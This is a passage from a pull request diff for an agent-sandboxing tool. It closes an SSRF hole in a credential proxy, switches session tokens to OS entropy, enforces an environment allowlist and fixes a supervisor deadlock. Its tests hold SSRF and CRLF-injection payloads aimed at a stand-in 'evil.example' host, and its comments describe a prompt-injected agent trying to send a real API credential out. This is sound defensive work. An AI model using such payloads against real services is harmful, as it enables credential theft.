### PR TITLE
Close a credential-proxy SSRF, a supervised containment gap, and a confined-run deadlock

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -599,6 +599,7 @@ dependencies = [
  "chrono",
  "console",
  "fastrand",
+ "getrandom 0.3.4",
  "git2",
  "h5i-error",
  "h5i-sandbox",
@@ -632,6 +633,7 @@ name = "h5i-sandbox"
 version = "0.2.8"
 dependencies = [
  "fastrand",
+ "getrandom 0.3.4",
  "git2",
  "h5i-error",
  "landlock",

--- a/MANUAL.md
+++ b/MANUAL.md
@@ -515,7 +515,7 @@ wall  = "30m"
 |---|---|---|
 | `workspace` | No confinement; just a separate worktree. | none |
 | `process` | Landlock + seccomp + namespaces, with a supervisor and a private pid namespace. | deny or host |
-| `supervised` | Adds a private netns with an nftables egress allowlist pinned to resolved IPs, DNS pinned by a hosts file, and a seccomp-notify gate on `socket()`. | **L3/L4** |
+| `supervised` | Everything `process` has, including the private pid namespace, plus a private netns with an nftables egress allowlist pinned to resolved IPs, DNS pinned by a hosts file, and a seccomp-notify gate on `socket()`. | **L3/L4** |
 | `container` | Rootless Podman: a portable image, with a CONNECT-proxy egress allowlist. | L7 |
 
 `auto` (the default) picks the strongest tier the host can actually run. An

--- a/crates/h5i-core/Cargo.toml
+++ b/crates/h5i-core/Cargo.toml
@@ -23,7 +23,11 @@ thiserror = { workspace = true }
 toml = { workspace = true }
 sha2 = "0.10"
 chrono = { version = "0.4", features = ["serde"] }
+# `fastrand` for retry jitter and WebSocket frame masking; `getrandom` for the
+# console/viewer session tokens, which gate a loopback listener and so need OS
+# entropy rather than a fast non-cryptographic generator (see `token`).
 fastrand = "2.3.0"
+getrandom = "0.3"
 console = "0.16.2"
 libc = "0.2.186"
 

--- a/crates/h5i-core/src/env.rs
+++ b/crates/h5i-core/src/env.rs
@@ -5778,7 +5778,18 @@ pub fn mediated_commit(
             git2::IndexAddOption::DEFAULT,
             Some(&mut cb as &mut git2::IndexMatchedPath),
         )?;
-        index.update_all(["*"].iter(), None)?;
+        // The SAME filter on the update pass. Today this is belt-and-braces
+        // rather than a hole being closed: `add_all` with a `"*"` pathspec
+        // already visits tracked entries, so a path that escapes `$WORK` through
+        // a symlinked parent is caught above and aborts the commit before this
+        // runs. But that safety is a property of libgit2's pathspec semantics,
+        // not of anything stated here, and the update pass re-stages tracked
+        // paths on its own terms. An invariant enforced on one of two staging
+        // paths is an invariant that depends on the other one never changing.
+        index.update_all(
+            ["*"].iter(),
+            Some(&mut cb as &mut git2::IndexMatchedPath),
+        )?;
     }
 
     // Post-stage sweep: reject submodule gitlink entries (mode 160000) that

--- a/crates/h5i-core/src/lib.rs
+++ b/crates/h5i-core/src/lib.rs
@@ -19,6 +19,7 @@ pub mod skill;
 pub mod source;
 pub mod storage;
 pub mod termview;
+pub mod token;
 pub mod ui;
 pub mod view;
 // The error type lives in its own leaf crate (`h5i-error`) so extracted crates

--- a/crates/h5i-core/src/server.rs
+++ b/crates/h5i-core/src/server.rs
@@ -554,14 +554,13 @@ async fn api_receipt(
 /// `h5i box capabilities --json` prints, so the console's top strip and the
 /// CLI can never disagree.
 async fn api_probe() -> Json<crate::sandbox::CapabilitiesReport> {
-    let report = tokio::task::spawn_blocking(|| {
-        // A capability report is a diagnostic: never serve it from the
-        // per-boot podman probe cache, exactly as `box probe` does.
-        std::env::set_var("H5I_NO_PROBE_CACHE", "1");
-        crate::sandbox::capabilities_report()
-    })
-    .await;
-    Json(report.unwrap_or_else(|_| crate::sandbox::capabilities_report()))
+    // A capability report is a diagnostic, so it is probed fresh rather than
+    // served from the per-boot podman cache — exactly as `box probe` does. The
+    // freshness is a property of the call, not of the process environment: this
+    // is a long-lived multithreaded server, and a `set_var` here would race
+    // every other thread's `getenv` and outlive the request that wanted it.
+    let report = tokio::task::spawn_blocking(crate::sandbox::capabilities_report_fresh).await;
+    Json(report.unwrap_or_else(|_| crate::sandbox::capabilities_report_fresh()))
 }
 
 /// Every route, wired to `state`. Extracted so tests can drive the surface
@@ -603,9 +602,7 @@ impl Console {
                 H5iError::Io(e)
             }
         })?;
-        let token: String = (0..TOKEN_BYTES)
-            .map(|_| format!("{:02x}", fastrand::u8(..)))
-            .collect();
+        let token = crate::token::hex(TOKEN_BYTES)?;
         Ok(Console {
             listener,
             state: Arc::new(AppState { repo_path, token }),

--- a/crates/h5i-core/src/token.rs
+++ b/crates/h5i-core/src/token.rs
@@ -1,0 +1,60 @@
+//! Session tokens: the one place h5i mints a secret.
+//!
+//! Two surfaces hand a bearer token to a human's browser and then trust it —
+//! the box console ([`crate::server`]) and the per-box viewer forward
+//! ([`crate::view`]). Both listen on loopback, which on a developer machine
+//! means every local process and every page the human has open can *reach*
+//! them; the token is the whole of what separates the operator from all of
+//! that. So it comes from the operating system's CSPRNG.
+//!
+//! Not `fastrand`, which the rest of the codebase uses for retry jitter and
+//! WebSocket masking. It is a small non-cryptographic generator seeded from
+//! ambient values, and its documentation says plainly that it is not suitable
+//! for anything security-sensitive: an attacker who can observe or guess that
+//! seed can reproduce the sequence, and a viewer token is long-lived on disk.
+//! Jitter can be predictable. A token cannot.
+
+use crate::error::H5iError;
+
+/// A fresh `n`-byte token, lowercase hex (so `2 * n` characters).
+///
+/// Fails rather than falling back to a weaker source: a host that cannot
+/// produce entropy should get no listener at all, not a guessable one.
+pub fn hex(n: usize) -> Result<String, H5iError> {
+    let mut raw = vec![0u8; n];
+    getrandom::fill(&mut raw).map_err(|e| {
+        H5iError::Metadata(format!(
+            "cannot mint a session token: no OS entropy ({e}) — refusing to fall back to a \
+             guessable one (fail-closed)"
+        ))
+    })?;
+    let mut out = String::with_capacity(n * 2);
+    for b in raw {
+        use std::fmt::Write as _;
+        let _ = write!(out, "{b:02x}");
+    }
+    Ok(out)
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn mints_hex_of_the_requested_width() {
+        let t = hex(16).expect("OS entropy");
+        assert_eq!(t.len(), 32);
+        assert!(t.bytes().all(|b| b.is_ascii_hexdigit()));
+    }
+
+    #[test]
+    fn every_token_is_distinct() {
+        // Not a randomness test — a collision here means the source is wired up
+        // wrong (a constant, a reused buffer), which is the failure that would
+        // actually ship.
+        let mut seen = std::collections::HashSet::new();
+        for _ in 0..256 {
+            assert!(seen.insert(hex(16).expect("OS entropy")), "repeated token");
+        }
+    }
+}

--- a/crates/h5i-core/src/view.rs
+++ b/crates/h5i-core/src/view.rs
@@ -39,8 +39,10 @@ use crate::error::H5iError;
 /// token the agent could hand to anything it can reach.
 const TOKEN_FILE: &str = "view-token";
 
-/// 128 bits, hex. Long enough that guessing is not a strategy against a
-/// loopback listener that exists for the life of one session.
+/// 128 bits of OS entropy, hex ([`crate::token`]). Long enough that guessing is
+/// not a strategy against a loopback listener that exists for the life of one
+/// session — and drawn from the system CSPRNG, because this one is written to
+/// disk and outlives the process that minted it.
 const TOKEN_BYTES: usize = 16;
 
 fn token_path(env_dir: &Path) -> PathBuf {
@@ -56,9 +58,7 @@ pub fn ensure_token(env_dir: &Path) -> Result<String, H5iError> {
     if let Some(existing) = read_token(env_dir) {
         return Ok(existing);
     }
-    let token: String = (0..TOKEN_BYTES)
-        .map(|_| format!("{:02x}", fastrand::u8(..)))
-        .collect();
+    let token = crate::token::hex(TOKEN_BYTES)?;
     let p = token_path(env_dir);
     if let Some(parent) = p.parent() {
         std::fs::create_dir_all(parent).map_err(|e| H5iError::with_path(e, parent))?;

--- a/crates/h5i-sandbox/Cargo.toml
+++ b/crates/h5i-sandbox/Cargo.toml
@@ -14,6 +14,10 @@ sha2 = "0.10"
 libc = "0.2.186"
 regex = "1"
 fastrand = "2.3.0"
+# OS entropy for the credential proxy's per-run gate token. `fastrand` is fast
+# and fine for jitter; it is explicitly not cryptographically secure, and this
+# token guards a proxy that injects a real API credential.
+getrandom = "0.3"
 tracing = "0.1"
 reqwest = { version = "0.12", default-features = false, features = ["blocking", "json", "rustls-tls"] }
 

--- a/crates/h5i-sandbox/src/auth_proxy.rs
+++ b/crates/h5i-sandbox/src/auth_proxy.rs
@@ -15,10 +15,15 @@
 //! - **Token never in the box.** The box sees only the base URL + a per-run dummy.
 //!   The real credential is resolved from *h5i's own* host environment and handed
 //!   straight to the upstream request — never an env var, mount, or argv in the box.
-//! - **No SSRF.** The upstream host is pinned to the runtime's single API host
-//!   ([`RuntimeProxy::upstream_host`]); a request's own `Host`/authority is ignored
-//!   and only its path is reused, so a prompt-injected box cannot aim the real
-//!   token at an attacker host.
+//! - **No SSRF.** The upstream origin is pinned to the runtime's single API host
+//!   ([`RuntimeProxy::upstream_host`]) and the box's own `Host` header is
+//!   discarded. Ignoring the authority is necessary but *not* sufficient, and the
+//!   difference is the subtle part: the request target is appended to that
+//!   origin, and a target that does not begin with `/` extends the authority
+//!   rather than the path (`@evil.example/v1` makes the pinned name mere
+//!   userinfo). So the target must be origin-form ([`is_origin_form`]) and the
+//!   assembled URL is re-parsed and required to resolve to the pinned origin
+//!   before a single byte is sent.
 //! - **DNS-rebinding resistant.** The upstream host is resolved+pinned once at
 //!   spawn (mirrors the egress proxy's `pin_dns`).
 //! - **Loopback + shared-secret gated.** The listener binds `127.0.0.1` (reachable
@@ -146,12 +151,28 @@ impl Drop for AuthProxyHandle {
     }
 }
 
+/// Largest request body the proxy will buffer, in bytes.
+///
+/// `Content-Length` is attacker-controlled (the box sends it), so the buffer
+/// must be sized from a constant rather than from the header — allocating
+/// `Content-Length` bytes on trust lets a prompt-injected box exhaust *host*
+/// memory with a single request. 32 MiB is comfortably above the largest real
+/// request these APIs accept (a message with inline images).
+const MAX_REQUEST_BODY: usize = 32 * 1024 * 1024;
+
+/// Concurrent forwarded requests. The box is one client; a bound here stops a
+/// loop of connections from spawning unbounded host threads.
+const MAX_IN_FLIGHT: usize = 64;
+
 /// Immutable per-proxy state shared with worker threads.
 struct ProxyState {
-    /// `https://api.anthropic.com` in production; an `http://127.0.0.1:<port>`
-    /// origin in tests. No trailing slash.
-    upstream_base: String,
-    /// The single upstream host (for the forced `Host` header / SSRF pin).
+    /// The origin the proxy forwards to, parsed once at spawn:
+    /// `https://api.anthropic.com` in production, an `http://127.0.0.1:<port>`
+    /// origin in tests. Kept as a `Url` rather than a string because it is the
+    /// reference every outgoing request is checked against (see
+    /// [`handle_client`]) — a comparison a string cannot make.
+    upstream: reqwest::Url,
+    /// The single upstream host, forced as the outgoing `Host` header.
     upstream_host: String,
     /// The genuine credential injected into every forwarded request.
     credential: Credential,
@@ -159,6 +180,8 @@ struct ProxyState {
     client_token: String,
     /// Blocking HTTP client (TLS via rustls, DNS pinned, no proxy, no redirects).
     client: reqwest::blocking::Client,
+    /// Requests currently being forwarded, against [`MAX_IN_FLIGHT`].
+    in_flight: std::sync::atomic::AtomicUsize,
 }
 
 /// Spawn the proxy for a runtime with a resolved credential. `client_token` is
@@ -202,7 +225,7 @@ pub fn engage_grant_at(
         header: CredHeader::Bearer,
         value,
     };
-    let token = new_client_token();
+    let token = new_client_token()?;
     let handle = spawn_to_upstream(
         format!("https://{}", grant.host),
         grant.host.clone(),
@@ -268,6 +291,12 @@ fn spawn_to_upstream(
         .build()
         .map_err(|e| H5iError::Metadata(format!("auth proxy: build HTTP client: {e}")))?;
 
+    // Parse the origin once, here, so every request can be checked against it
+    // instead of against a string that concatenation might have moved.
+    let upstream = reqwest::Url::parse(&upstream_base).map_err(|e| {
+        H5iError::Metadata(format!("auth proxy: invalid upstream origin '{upstream_base}': {e}"))
+    })?;
+
     let listener = TcpListener::bind("127.0.0.1:0").map_err(H5iError::Io)?;
     let port = listener.local_addr().map_err(H5iError::Io)?.port();
     listener.set_nonblocking(true).map_err(H5iError::Io)?;
@@ -275,11 +304,12 @@ fn spawn_to_upstream(
     let stop = Arc::new(AtomicBool::new(false));
     let stop_thread = stop.clone();
     let state = Arc::new(ProxyState {
-        upstream_base,
+        upstream,
         upstream_host,
         credential,
         client_token,
         client,
+        in_flight: std::sync::atomic::AtomicUsize::new(0),
     });
 
     let join = std::thread::spawn(move || {
@@ -290,8 +320,22 @@ fn spawn_to_upstream(
                         break;
                     }
                     let state = state.clone();
+                    // Bound concurrent forwards: the box is a single client, and
+                    // an accept loop that spawns a thread per connection is a
+                    // host resource the box should not be able to grow without
+                    // limit. Over the cap we answer and close rather than queue.
+                    let live = state
+                        .in_flight
+                        .fetch_add(1, Ordering::SeqCst);
+                    if live >= MAX_IN_FLIGHT {
+                        state.in_flight.fetch_sub(1, Ordering::SeqCst);
+                        let mut client = client;
+                        write_status(&mut client, 503, "Service Unavailable");
+                        continue;
+                    }
                     std::thread::spawn(move || {
                         let _ = handle_client(client, &state);
+                        state.in_flight.fetch_sub(1, Ordering::SeqCst);
                     });
                 }
                 Err(ref e) if e.kind() == std::io::ErrorKind::WouldBlock => {
@@ -372,6 +416,34 @@ fn is_stripped_request_header(name: &str) -> bool {
             | "trailer"
             | "upgrade"
     )
+}
+
+/// Is `target` a safe **origin-form** request target (`/v1/messages?beta=1`)?
+///
+/// This is the SSRF gate, and it is load-bearing rather than cosmetic. The
+/// outgoing URL is the pinned origin with this string appended, and a URL's
+/// authority runs until the first `/` — so a target that does not start with
+/// `/` can extend the *authority* instead of the path. The sharp case is
+/// userinfo: `@evil.example/v1/messages` turns
+/// `https://api.anthropic.com` + target into
+/// `https://api.anthropic.com@evil.example/v1/messages`, whose host is
+/// `evil.example` and whose userinfo is the name we thought we had pinned. The
+/// proxy would then open TLS to the attacker (SNI and certificate validation
+/// following the *attacker's* name, so any ordinary certificate satisfies it)
+/// and attach the real credential — the exact exfiltration the credential proxy
+/// exists to prevent.
+///
+/// Origin-form is also all these SDKs ever send, so nothing legitimate is lost.
+/// A leading `//` is refused too: it is the protocol-relative form, harmless
+/// against today's origin but one trailing slash away from meaning `//host/`.
+/// Control characters and whitespace are refused because they are request
+/// smuggling, not paths.
+fn is_origin_form(target: &str) -> bool {
+    target.starts_with('/')
+        && !target.starts_with("//")
+        && !target
+            .bytes()
+            .any(|b| b <= b' ' || b == 0x7f || b == b'\\')
 }
 
 /// Parse the request line + headers. Returns `None` on a malformed head.
@@ -490,6 +562,19 @@ fn handle_client(mut client: TcpStream, state: &ProxyState) -> std::io::Result<(
         return Ok(());
     };
 
+    // SSRF gate, before anything is read or forwarded: only an origin-form
+    // target may be appended to the pinned origin. See [`is_origin_form`].
+    if !is_origin_form(&req.path) {
+        write_status(&mut client, 403, "Forbidden");
+        return Ok(());
+    }
+
+    // Never allocate on an attacker-supplied length.
+    if req.content_length > MAX_REQUEST_BODY {
+        write_status(&mut client, 413, "Payload Too Large");
+        return Ok(());
+    }
+
     // Read the request body (Content-Length framed; these SDKs always send one).
     let mut body = vec![0u8; req.content_length];
     if req.content_length > 0 && client.read_exact(&mut body).is_err() {
@@ -497,9 +582,26 @@ fn handle_client(mut client: TcpStream, state: &ProxyState) -> std::io::Result<(
         return Ok(());
     }
 
-    // Build the upstream request against the PINNED host (path reused, authority
-    // ignored → no SSRF), injecting the genuine credential.
-    let url = format!("{}{}", state.upstream_base, req.path);
+    // Build the upstream request against the PINNED origin, injecting the
+    // genuine credential. The target was already checked to be origin-form; the
+    // parse below is the second, independent check — whatever the concatenation
+    // produced, it must still resolve to exactly the origin we pinned at spawn,
+    // with no userinfo. Two cheap checks guard the one irreversible act this
+    // process performs: handing the real credential to whoever answers.
+    let base = state.upstream.as_str().trim_end_matches('/');
+    let url = match reqwest::Url::parse(&format!("{base}{}", req.path)) {
+        Ok(u)
+            if u.origin() == state.upstream.origin()
+                && u.username().is_empty()
+                && u.password().is_none() =>
+        {
+            u
+        }
+        _ => {
+            write_status(&mut client, 403, "Forbidden");
+            return Ok(());
+        }
+    };
     let method = match reqwest::Method::from_bytes(req.method.as_bytes()) {
         Ok(m) => m,
         Err(_) => {
@@ -507,7 +609,7 @@ fn handle_client(mut client: TcpStream, state: &ProxyState) -> std::io::Result<(
             return Ok(());
         }
     };
-    let mut builder = state.client.request(method, &url).header("host", &state.upstream_host);
+    let mut builder = state.client.request(method, url).header("host", &state.upstream_host);
     for (name, value) in &req.headers {
         builder = builder.header(name, value);
     }
@@ -549,11 +651,30 @@ fn handle_client(mut client: TcpStream, state: &ProxyState) -> std::io::Result<(
     Ok(())
 }
 
-/// A short, unguessable per-run token the box presents to the proxy. Not a
-/// credential — it only distinguishes the box from other host processes on
-/// loopback, so plain PRNG entropy is sufficient.
-pub fn new_client_token() -> String {
-    format!("h5i-proxy-{:016x}{:016x}", fastrand::u64(..), fastrand::u64(..))
+/// A short, unguessable per-run token the box presents to the proxy.
+///
+/// Not itself a credential, but it is the only thing standing between *other
+/// local processes* and a proxy that injects the real one, so the entropy has to
+/// come from the OS rather than from a fast general-purpose PRNG whose state a
+/// same-host attacker could plausibly reconstruct. 128 bits, hex.
+///
+/// Fails rather than falls back: a host that cannot produce entropy must not get
+/// a guessable gate on a credential-injecting proxy.
+pub fn new_client_token() -> Result<String, H5iError> {
+    let mut raw = [0u8; 16];
+    getrandom::fill(&mut raw).map_err(|e| {
+        H5iError::Metadata(format!(
+            "auth proxy: no OS entropy for the per-run token ({e}) — refusing to mint a \
+             guessable one (fail-closed)"
+        ))
+    })?;
+    let mut out = String::with_capacity("h5i-proxy-".len() + raw.len() * 2);
+    out.push_str("h5i-proxy-");
+    for b in raw {
+        use std::fmt::Write as _;
+        let _ = write!(out, "{b:02x}");
+    }
+    Ok(out)
 }
 
 /// The operator opt-out: keep the box on its own in-box login (e.g. to bill a
@@ -605,7 +726,13 @@ pub fn engage_at(profile_name: &str, tier_ok: bool, host: &str) -> Option<Engage
     }
     let rt = AgentRuntime::from_profile_name(profile_name)?;
     let cred = resolve_credential(rt)?;
-    let token = new_client_token();
+    let token = match new_client_token() {
+        Ok(t) => t,
+        Err(e) => {
+            eprintln!("note: credential proxy unavailable ({e}); box uses in-box login");
+            return None;
+        }
+    };
     match spawn(rt, cred, token.clone()) {
         Ok(handle) => Some(Engagement {
             box_env: box_env_at(rt, host, handle.port, &token),
@@ -881,8 +1008,8 @@ mod tests {
 
     #[test]
     fn client_token_is_unguessable_and_unique() {
-        let a = new_client_token();
-        let b = new_client_token();
+        let a = new_client_token().unwrap();
+        let b = new_client_token().unwrap();
         assert_ne!(a, b, "each run gets a distinct token");
         assert!(a.starts_with("h5i-proxy-"));
         // 32 hex chars of entropy after the prefix.
@@ -947,6 +1074,111 @@ mod tests {
         assert!(!head_lower.contains("content-length"), "upstream content-length stripped: {resp}");
         assert!(!head_lower.contains("transfer-encoding"), "upstream transfer-encoding stripped: {resp}");
         assert!(head_lower.contains("connection: close"));
+    }
+
+    /// The SSRF gate, as a table. A URL's authority ends at the first `/`, so a
+    /// target that does not start with one can rewrite the host it is appended
+    /// to — `@evil/…` most sharply, via userinfo.
+    #[test]
+    fn only_origin_form_targets_are_accepted() {
+        for good in ["/", "/v1/messages", "/v1/models?limit=5", "/a/b?q=x&y=z#frag"] {
+            assert!(is_origin_form(good), "must accept {good}");
+        }
+        for bad in [
+            "@evil.example/v1/messages",   // userinfo: the host becomes evil.example
+            "@evil.example",               //
+            ":9999@evil.example/v1",       // userinfo with a password field
+            "//evil.example/v1",           // protocol-relative
+            "https://evil.example/v1",     // absolute-form
+            "v1/messages",                 // bare relative
+            "",                            //
+            "/v1 /messages",               // whitespace: request smuggling
+            "/v1\r\nX-Injected: 1",        // CRLF injection
+            "/v1\\..\\evil",               // backslash
+        ] {
+            assert!(!is_origin_form(bad), "must reject {bad:?}");
+        }
+    }
+
+    /// The regression that matters most in this file: a box that presents the
+    /// per-run token must not be able to aim the *real* credential at a host of
+    /// its choosing. The rogue upstream here stands in for an attacker-controlled
+    /// domain (which, having an ordinary valid certificate for its own name,
+    /// would satisfy TLS verification — the pinned name is not what gets
+    /// checked once the URL's host has moved).
+    #[test]
+    fn a_userinfo_target_cannot_redirect_the_credential() {
+        use std::sync::mpsc;
+
+        let rogue = TcpListener::bind("127.0.0.1:0").unwrap();
+        let rogue_port = rogue.local_addr().unwrap().port();
+        let (tx, rx) = mpsc::channel::<()>();
+        std::thread::spawn(move || {
+            // Any connection at all is a failure: the proxy must refuse before
+            // it opens one.
+            for _stream in rogue.incoming().take(1) {
+                let _ = tx.send(());
+            }
+        });
+
+        let cred = Credential { header: CredHeader::Bearer, value: "REAL-TOKEN-SECRET".into() };
+        let handle = spawn_to_upstream(
+            "https://api.anthropic.com".into(),
+            "api.anthropic.com".into(),
+            cred,
+            "dummy-tok".into(),
+            false,
+        )
+        .unwrap();
+
+        for target in [
+            format!("@127.0.0.1:{rogue_port}/v1/messages"),
+            format!("@localhost:{rogue_port}/v1/messages"),
+            format!("https://127.0.0.1:{rogue_port}/v1/messages"),
+        ] {
+            let mut c = TcpStream::connect(("127.0.0.1", handle.port)).unwrap();
+            let req = format!(
+                "POST {target} HTTP/1.1\r\nHost: 10.0.2.2\r\nAuthorization: Bearer dummy-tok\r\n\
+                 Content-Length: 0\r\n\r\n"
+            );
+            c.write_all(req.as_bytes()).unwrap();
+            let mut resp = String::new();
+            let _ = c.read_to_string(&mut resp);
+            assert!(
+                resp.starts_with("HTTP/1.1 403"),
+                "target {target:?} must be refused, got: {resp}"
+            );
+        }
+
+        assert!(
+            rx.recv_timeout(Duration::from_millis(500)).is_err(),
+            "the proxy connected to an attacker-chosen host — the credential is exfiltratable"
+        );
+    }
+
+    /// `Content-Length` is written by the box. Sizing a buffer from it lets one
+    /// request exhaust host memory, so an oversized declaration is refused
+    /// before anything is allocated.
+    #[test]
+    fn an_oversized_content_length_is_refused_not_allocated() {
+        let cred = Credential { header: CredHeader::Bearer, value: "R".into() };
+        let handle = spawn_to_upstream(
+            "http://127.0.0.1:1".into(), // never contacted
+            "pinned.example".into(),
+            cred,
+            "dummy-tok".into(),
+            false,
+        )
+        .unwrap();
+        let mut c = TcpStream::connect(("127.0.0.1", handle.port)).unwrap();
+        c.write_all(
+            b"POST /v1/messages HTTP/1.1\r\nHost: x\r\nAuthorization: Bearer dummy-tok\r\n\
+              Content-Length: 999999999999\r\n\r\n",
+        )
+        .unwrap();
+        let mut resp = String::new();
+        let _ = c.read_to_string(&mut resp);
+        assert!(resp.starts_with("HTTP/1.1 413"), "{resp}");
     }
 
     #[test]

--- a/crates/h5i-sandbox/src/container.rs
+++ b/crates/h5i-sandbox/src/container.rs
@@ -146,6 +146,19 @@ pub fn probe() -> Option<Runtime> {
         .clone()
 }
 
+/// [`probe`] with both caches bypassed, for the diagnostic paths (`box probe`,
+/// `box capabilities`, the console's `/api/probe`) that must report the host as
+/// it is right now.
+///
+/// A function rather than the `H5I_NO_PROBE_CACHE` environment variable: those
+/// callers used to set that variable at run time, which mutates process-global
+/// state shared with every other thread (unsound in a threaded program, and a
+/// side effect that outlived the one call that wanted it). The variable stays as
+/// an operator escape hatch — read, never written.
+pub fn probe_fresh() -> Option<Runtime> {
+    probe_uncached()
+}
+
 fn probe_uncached() -> Option<Runtime> {
     if !version_ok("podman") {
         return None;

--- a/crates/h5i-sandbox/src/sandbox.rs
+++ b/crates/h5i-sandbox/src/sandbox.rs
@@ -810,6 +810,18 @@ pub fn probe_host() -> HostCaps {
         .clone()
 }
 
+/// Uncached full probe — the **diagnostic** path.
+///
+/// Bypasses both the in-process memo and the per-boot Podman probe cache, so a
+/// report describes the host as it is now rather than as the first caller found
+/// it. Callers that just need to resolve a policy should use [`probe_host`];
+/// paying ~1s of `podman info` on every run is the reason the cache exists.
+pub fn probe_host_fresh() -> HostCaps {
+    let mut caps = probe_host_kernel_uncached();
+    caps.container_runtime = crate::container::probe_fresh().map(|r| r.bin);
+    caps
+}
+
 /// Kernel-only probe: Landlock/userns/seccomp, but **not** the ~1s Podman
 /// shell-out (`container_runtime` is left `None`). `resolve` only reads
 /// `container_runtime` inside the container arm (after the image check), and
@@ -900,7 +912,18 @@ pub struct CapabilitiesReport {
 /// (`resolve` + functional `verify_exec`) used by `env create`. Shells out to
 /// `podman info` once (via [`probe_host`]) — reserve for diagnostic paths.
 pub fn capabilities_report() -> CapabilitiesReport {
-    let caps = probe_host();
+    capabilities_report_from(probe_host())
+}
+
+/// [`capabilities_report`] against a freshly-probed host, bypassing both the
+/// in-process memo and the per-boot Podman cache. This is what the diagnostics
+/// (`box probe`, `box capabilities`, the console's `/api/probe`) want: a report
+/// that is stale is a report that misleads about what the host can enforce.
+pub fn capabilities_report_fresh() -> CapabilitiesReport {
+    capabilities_report_from(probe_host_fresh())
+}
+
+fn capabilities_report_from(caps: HostCaps) -> CapabilitiesReport {
     let mut claims: Vec<ClaimSupport> = Vec::new();
     let mut strongest = IsolationClaim::Workspace;
 
@@ -1303,13 +1326,7 @@ pub fn spawn_background(
                 .stdin(std::process::Stdio::null())
                 .stdout(out)
                 .stderr(err);
-            cmd.env_clear();
-            for key in &policy.profile.env_pass {
-                if let Ok(v) = std::env::var(key) {
-                    cmd.env(key, v);
-                }
-            }
-            apply_injected_env(&mut cmd, injected_env);
+            apply_env_allowlist(&mut cmd, &policy.profile, injected_env);
             // Own session so a later killpg(pid) reaps the whole descendant tree.
             #[cfg(unix)]
             unsafe {
@@ -1421,9 +1438,8 @@ pub fn run_interactive(
     let injected = augment_injected_env(policy, injected_env);
     let injected_env = injected.as_slice();
     match policy.claim {
-        IsolationClaim::Workspace => {
-            interactive_unconfined(work, argv, injected_env).map(InteractiveOutcome::from_code)
-        }
+        IsolationClaim::Workspace => interactive_unconfined(policy, work, argv, injected_env)
+            .map(InteractiveOutcome::from_code),
         IsolationClaim::Process => {
             interactive_confined(policy, work, argv, injected_env)
                 .map(InteractiveOutcome::from_code)
@@ -1457,13 +1473,14 @@ pub fn run_interactive(
 /// Interactive workspace tier: inherited stdio, a new session so signals reach
 /// the whole tree, no confinement (trusted code).
 fn interactive_unconfined(
+    policy: &ResolvedPolicy,
     work: &Path,
     argv: &[String],
     injected_env: &[(String, String)],
 ) -> Result<i32, H5iError> {
     let mut cmd = std::process::Command::new(&argv[0]);
     cmd.args(&argv[1..]).current_dir(work);
-    apply_injected_env(&mut cmd, injected_env);
+    apply_env_allowlist(&mut cmd, &policy.profile, injected_env);
     let status = cmd
         .status()
         .map_err(|e| H5iError::Metadata(format!("failed to start '{}': {e}", argv[0])))?;
@@ -1532,6 +1549,35 @@ fn apply_injected_env(cmd: &mut std::process::Command, injected_env: &[(String, 
     for (k, v) in injected_env {
         cmd.env(k, v);
     }
+}
+
+/// Give `cmd` exactly the environment the profile allows: nothing inherited
+/// wholesale, the `env.pass` names forwarded from the host, then the brokered
+/// secrets layered on top (so a grant is never shadowed by a passed-through
+/// host var).
+///
+/// **Every tier goes through this, `workspace` included.** That tier applies no
+/// kernel confinement, which is a reason to skip the *sandbox*, not a reason to
+/// skip the allowlist: `env_pass` is part of the resolved policy, it is covered
+/// by the pinned digest, and `box status` shows it to a reviewer as the
+/// environment that was enforced. A tier that quietly handed the child the
+/// operator's whole environment — every API token in their shell — would make
+/// that display say something untrue, which is the one failure this codebase
+/// keeps refusing to ship. It also read strangely from inside: background
+/// services at the workspace tier already got the allowlist while captured runs
+/// and interactive sessions did not.
+fn apply_env_allowlist(
+    cmd: &mut std::process::Command,
+    profile: &Profile,
+    injected_env: &[(String, String)],
+) {
+    cmd.env_clear();
+    for key in &profile.env_pass {
+        if let Ok(v) = std::env::var(key) {
+            cmd.env(key, v);
+        }
+    }
+    apply_injected_env(cmd, injected_env);
 }
 
 /// For an **agent-in-box** profile, signal Claude Code that uid 0 inside the box
@@ -1632,7 +1678,7 @@ fn run_unconfined(
 ) -> Result<ExecOutcome, H5iError> {
     let mut cmd = std::process::Command::new(&argv[0]);
     cmd.args(&argv[1..]).current_dir(work);
-    apply_injected_env(&mut cmd, injected_env);
+    apply_env_allowlist(&mut cmd, &policy.profile, injected_env);
     // New session so the wall-clock kill reaps the whole tree (killpg), the
     // same group-kill guarantee the confined path gets.
     #[cfg(unix)]
@@ -1670,6 +1716,90 @@ pub(crate) struct EgressJail {
     pub nft_envp: std::ffi::CString,
     /// Path to the temp file holding the pinned `/etc/hosts` content.
     pub hosts_src: std::ffi::CString,
+}
+
+/// Close every descriptor above stdio in the calling process.
+///
+/// Called by the PID-namespace supervisor immediately after its `fork`, and the
+/// reason is subtle enough to be worth stating: `Command::spawn` hands the child
+/// a `CLOEXEC` status pipe and returns only once **every** copy of that pipe's
+/// write end is closed. The workload's copy closes at `execve`, but the
+/// supervisor — forked from the same child, and never exec'ing — keeps its copy
+/// for the whole run. A supervisor that holds it makes `spawn()` block until the
+/// workload exits, which in turn means the stdout/stderr drain threads (started
+/// after `spawn` returns) never run: any command whose output fills the 64 KiB
+/// pipe deadlocks, and the wall-clock deadline is not armed until after the run
+/// it was meant to bound. The supervisor needs no inherited descriptor — it
+/// waits, mirrors an exit code, and dies — so it drops all of them.
+///
+/// Allocation-free and async-signal-safe (raw syscalls only), as everything on
+/// the post-fork path must be.
+///
+/// # Safety
+/// Closes descriptors process-wide; only ever call it in a forked child that
+/// owns no other users of those descriptors.
+#[cfg(target_os = "linux")]
+unsafe fn close_inherited_fds() {
+    // close_range(2) is Linux 5.9+; Landlock needs 5.13+, so on any host that
+    // reaches this code it is present and this is the only branch that runs.
+    if libc::syscall(libc::SYS_close_range, 3 as libc::c_uint, libc::c_uint::MAX, 0) == 0 {
+        return;
+    }
+    // Fallback for a kernel (or seccomp policy) without close_range: walk the
+    // descriptor table. Bounded so a huge RLIMIT_NOFILE cannot stall the fork.
+    let mut lim: libc::rlimit = std::mem::zeroed();
+    let max = if libc::getrlimit(libc::RLIMIT_NOFILE, &mut lim) == 0 && lim.rlim_cur > 3 {
+        lim.rlim_cur.min(65536) as i32
+    } else {
+        4096
+    };
+    for fd in 3..max {
+        libc::close(fd);
